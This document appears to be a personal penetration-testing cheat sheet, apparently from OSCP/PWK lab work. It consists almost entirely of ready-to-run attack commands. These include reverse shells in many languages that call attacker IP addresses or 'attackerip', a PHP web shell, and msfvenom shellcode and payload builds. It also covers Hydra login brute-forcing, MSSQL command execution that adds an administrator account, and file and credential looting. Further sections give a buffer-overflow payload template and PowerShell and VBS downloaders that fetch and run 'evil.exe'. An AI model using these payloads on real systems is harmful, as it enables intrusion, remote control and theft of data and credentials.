* TCP portscan using netcat
nc -nvv -w 1 -z 10.0.0.19 3388-3390

* UDP portscan using netcat
nc -u -nvv -w 1 -z 10.0.0.19 3388-3390

* Ping sweep
nmap -sn 10.11.1.1-254

Compile exploit
==============
gcc -Wl,–hash-style=both -o sock sockpage.c

Reverse Shell Cheat Sheet
========================

* Bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i >& /dev/tcp/192.168.178.102/5555 0>&1

* Bash Reverse Shell
exec 5<>/dev/tcp/attackerip/4444
exec 5<>/dev/tcp/192.168.178.102/9999
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

* Perl reverse Shell
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

* Perl reverse shell

perl -e 'use Socket;$i="10.11.0.112";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

* Python reverse shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.11.0.192”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.178.102”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.178.102”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.101”,9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.11.0.192”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“c:\\windows\\system32\\cmd.exe”,””]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.11.0.192”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“c:\\windows\\system32\\cmd.exe”,””]);’

* PHP reverse shell
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
php -r ‘$sock=fsockopen(“192.168.178.102”,5555);exec(“/bin/sh -i <&3 >&3 2>&3”);’

* PHP meterpreter reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.13 LPORT=443 -f raw > code.php

* php-reverseshell
cp /oscp/reverse_shells/php/php-reverse-shell-1.0/php-reverse-shell.php rev.php

* PHP simple shell Linux
<?php $cmd=$_GET[‘cmd’]; echo `$cmd`; ?>

* Ruby Reverse shell
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

* Ruby Reverse Shell target windows
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

* Netcat reverse Shell
nc -e /bin/sh 10.0.0.1 1234

* Netcat reverse Shell Bash
/bin/sh | nc attackerip 4444
/bin/sh -i | nc 192.168.178.102 9999

* Netcat reverse Shell without nc -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.0.192 5555 >f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f

* Netcat Reverse Shell without bash
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

* Java reverse shell
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

* xterm
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

* Telnet reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
rm -f p; mknod p p && telnet 192.168.178.102 9999 0/p
rm -f p; mknod p p && telnet 10.10.10.101 9999 0/p

* Telnet Reverse Shell
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp
telnet 192.168.178.102 5555 | /bin/bash | telnet 192.168.178.102 4445 # Remember to listen on your machine also on port 4445/tcp

* Shell from TCPDUMP
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
From within IRB: exec “/bin/sh”

* From within vi:
:!bash or
:set shell=/bin/bash:shell

* From within vim
‘:!bash’:

* From within nmap:
sudo nmap –interactive
nmap> !sh
sh-4.1#

* Windows Powershell/Unicorn Reverse Shell
cd /opt/unicorn
python unicorn.py windows/meterpreter/reverse_https X.X.X.X 4444
Payload for code execution:
Powershell IEX(New Object Net.WebClient).downloadString(‘http://foobar/unicorn.txt’)
cp powershell_attack.txt /var/www/html/
mfsconsole -r unicorn.rc

Good Users
==========
ftpuser:ftpuser
bob:lablab

Bruteforce
==========

HTTP POST FORM BRUTE FORCE
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt 10.11.1.39 http-post-form “/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed” -I

WORDPRESS ADMIN BRUTE FORCE
hydra -l admin -P cewl.txt 10.11.1.234 http-post-form “/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.11.1.234%2Fwp-admin%2F&testcookie=1:F=ERROR” -I

WORDPRESS ENUMERATE USER NAME BRUTE FORCE
hydra -vV -L fsocity.dic.uniq -p wedontcare 192.168.2.4 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’

WORDPRESS BRUTE FORCE PASSWORD
hydra -vV -l elliot -P fsocity.dic.uniq vm http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect’

HTTP .htaccess brute force
medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10

HYDRA username variantions as passwords
/root/scripts/hydra -l USERNAME -e nsr ftp://192.168.178.110
-e nsr additional checks, “n” for null password, “s” try login as
pass, “r” try the reverse login as pass

HYDRA VERBOSE MODE
/root/scripts/hydra -v -V -u -L which_one_lol.txt -P which_one_lol.txt -t 1 -u troll ssh

IDENTIFY WINDOWS SERVICE PACK
=================================
C:\WINDOWS\System32

apphelp.dll -> SP3
xpsp1res.dll -> SP1
xpsp2res.dll -> SP2
xpsp3res.dll -> SP3

SHELL THROUH MSSQL
==================
SA account has admistrative permissions
-> msfconsole
use auxiliary/admin/mssql/mssql_exec
set RHOST 10.11.1.31
set PASSWORD xxxx
set CMD cmd.exe /c net user /add gamma gamma
run
set CMD cmd.exe /c “net localgroup \”Remote Desktop Users\” /add”
run
set CMD cmd.exe /c net localgroup “Administrators” gamma /add
run
-> login through remote desktop

LINUX LOOTING
=============
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

find / -name “*.txt”
find / -name “*.doc*”
find / -name “*.rar”
find / -name “*.xls*”
find / -name “*.doc”
find / -name “*.sql”

.ssh:
.bash_history

Linux Priviledge Escalation
============================
#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

* suid binaries
find / -perm /u=s -type f

* Cronjob
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
ls -al /etc/cron.d/
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

* World Writeable Directories

/tmp
/var/tmp
/dev/shm
/var/spool/vbox
/var/spool/samba

* Find mysql password
grep -Rni “DB_PASS” /
grep -Rni “DB_USER” /

* Look for running cron jobs:
#!/bin/bash
# Loop by line
IFS=$’\n’
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo “$old_process”) <(echo “$new_process”) | grep [\<\>]
sleep 1
old_process=$new_process
done

=========
Cracking Passwords

* Crack Raw MD5
john –format=raw-md5 hashfilepath

* Crack ZIP/RAR
zip2john zipfile > output.txt
rar2john rarfile > output.txt
-> than john

* characters a 1-8 length
fcrackzip -b -c a -l 1-8 -u -v lmao.zip

* dictorny
fcrackzip -u -D -p passwordlist.txt lmao.zip

* generate password list
https://charlesreid1.com/wiki/John_the_Ripper/Password_Generation

cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
-> -m min word length 6
-> -w output to file

nano /etc/john/john.conf
john –wordlist=megacorp-cewl.txt –rules –stdout > mutated.txt

* using Crunch
# crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

=========================
Buffer Overflow

# Payload
payload = “\x41” * <length> + <ret_address> + “\x90” * 16 + <shellcode> + “\x43” * <remaining_length>

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

Find Offset of EIP in Buffer
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438

BadChars
badchars = (
“\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10”
“\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20”
“\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30”
“\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50”
“\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60”
“\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70”
“\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80”
“\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90”
“\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0”
“\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0”
“\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0”
“\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0”
“\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0”
“\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0”
“\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff” )

In ImmunityDebug:
!mona modules
find a module that has:
rebase: false
safeseh: false
aslr: false
nxcompat: fals

View -> Executable Modules
Right click -> view memory on tht module
View Code in CPU

Find a JMP ESP
usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp

!mona find -s “\xff\xe4” -m slmfc.dll

shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.192 R LPORT=9999 -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

* /bin/bash linux execve
msfvenom –platform linux -p linux/x86/exec -f py CMD=”/bin/sh” -b ‘\x00\x0a\x0d’ -a x86

shellcode keeps running when SLmail crashes
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.192 R LPORT=9999 -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d” EXITFUNC=thread

* small shellcode

msfvenom -p windows/shell_reverse_tcp -a x86 -f python –platform windows LHOST=<ip> LPORT=443 -b “\x00” EXITFUNC=thread –smallest -e x86/fnstenv_mov

====================

PROOF:

* Linux proof

hostname && whoami && cat proof.txt && /sbin/ifconfig

* Windows proof

hostname && whoami.exe && type proof.txt && ipconfig /all

=================

JPEG Anaylis
————

exiftool a.jpg
binwalk a.jpg

==================
WEBDAV
——
* davtest -url http://foobar:80
-> test what file extensions are allowed to be uploaded

TFTP
I use solarwinds free tftp server on windows ( and allowing udp port 69 on my windows firewall )

on XP target run

C:\Users\Administrator>tftp -i 10.11.0.112 GET evil.exe
Transfer successful: 59392 bytes in 10 second(s), 5939 bytes/s

FTP

root@kali# apt-get install python-pyftpdlib
root@kali# python -m pyftpdlib -p 21
c:\users\jacco\type ftp-commands.txt
ftp
open 192.168.178.12 21 
USER
anonymous 
anonymous
USER
anonymous 
anonymous
bin 
GET nc.exe

c:\users\jacco\ftp -s:ftp-commands.txt

https://vulp3cula.gitbook.io/hackers-grimoire/windows-basics
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

downloading files on machines that have PowerShell installed, is shown below.
C:\Users\jacco> echo $storageDir = $pwd > wget.ps1
C:\Users\jacco> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\jacco> echo $url = "http://192.168.178.12/nc.exe" >>wget.ps1
C:\Users\jacco> echo $file = "new-ncexploit.exe" >>wget.ps1
C:\Users\jacco> echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now, we can use PowerShell to run the script and download our file:

C:\Users\jacco> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -File wget.ps1
root@kali:~/pwk/tftp# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.15 - - [11/Jun/2019 05:46:35] "GET /nc.exe HTTP/1.1" 200 -
C:\Users\jacco>new-ncexploit.exe -lvp 443
listening on [any] 443 ...

.

Scripting engines such as VBScript (in Windows XP, 2003) and PowerShell (in Windows
7, 2008, and above) can both download files to our victim machine.  The following set of non-interactive echo commands, when pasted into a remote shell, will write out a VBS script that acts as a simple HTTP downloader.. ( works only correct on 32bits windows versions !)

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Now, we can serve files on our own web server, and download them to the victim
machine with ease:
C:\Users\jacco>cscript wget.vbs http://10.11.0.112/evil.exe evil.exe

An even simpler example, for downloading files on machines that have PowerShell
installed, is shown below.

C:\Users\jacco> echo $storageDir = $pwd > wget.ps1
C:\Users\jacco> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\jacco> echo $url = "http://10.11.0.112/evil.exe" >>wget.ps1
C:\Users\jacco> echo $file = "new-exploit.exe" >>wget.ps1
C:\Users\jacco> echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now, we can use PowerShell to run the script and download our file:

C:\Users\jacco> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -File wget.ps1

.

msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 10.11.x.x:8080 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.112 LPORT=443 -f war > shell.war
root@kali:~/pwk# python tomcat.py -v  bf -U UFILE -P PFILE /manager/html 10.11.1.x
root@kali:/usr/share/nmap/scripts# nmap -sV --script vulners 192.168.178.25
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-12 05:01 EDT
Nmap scan report for 192.168.178.25
Host is up (0.00041s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 5.1
|_http-server-header: Microsoft-IIS/5.1
| vulners: 
| cpe:/a:microsoft:iis:5.1: 
| CVE-2008-1446 9.0 https://vulners.com/cve/CVE-2008-1446
| CVE-2009-1535 7.6 https://vulners.com/cve/CVE-2009-1535
| CVE-2010-2731 6.8 https://vulners.com/cve/CVE-2010-2731
| CVE-2011-5279 6.4 https://vulners.com/cve/CVE-2011-5279
| CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
|_ CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
MAC Address: 08:00:27:7F:DA:07 (Oracle VirtualBox virtual NIC)
Service Info: Host: xppro; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.06 seconds

.